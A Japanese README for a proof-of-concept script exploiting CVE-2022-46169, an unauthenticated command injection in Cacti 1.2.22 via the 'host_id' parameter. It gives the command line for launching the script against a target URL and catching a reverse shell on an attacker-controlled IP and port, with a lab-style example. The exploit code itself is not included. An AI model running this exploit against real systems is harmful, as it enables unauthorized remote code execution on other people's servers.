
Cacti 1.2.22 に影響を与える CVE-2022-46169 の PoC
これは、Cacti バージョン 1.2.22 に影響を与える CVE-2022-46169 脆弱性の概念実証 (POC) スクリプトです。
CVE-2022-46169 脆弱性は、Cacti バージョン 1.2.22 までのバージョンにおいて、認証されていないコマンドインジェクションを許容し、www-data ユーザーとして認証されていないリモートコード実行を達成するものです。この脆弱性は、"remote_agent.php" ファイルの "host_id" パラメータにおけるユーザー入力の不適切な検証に起因します。
python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>
<TARGET_URL> を対象の Cacti インストールの URL に、<YOUR_IP> をリバースシェルを受信するマシンの IP アドレスに、<YOUR_PORT> をリバースシェルを受信するポート番号に置き換えてください。
例:
python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337
この POC スクリプトは教育目的のみです。自己責任で使用してください。このスクリプトの作成者は、このスクリプトの使用によって生じたいかなる損害に対しても責任を負いません。
参考文献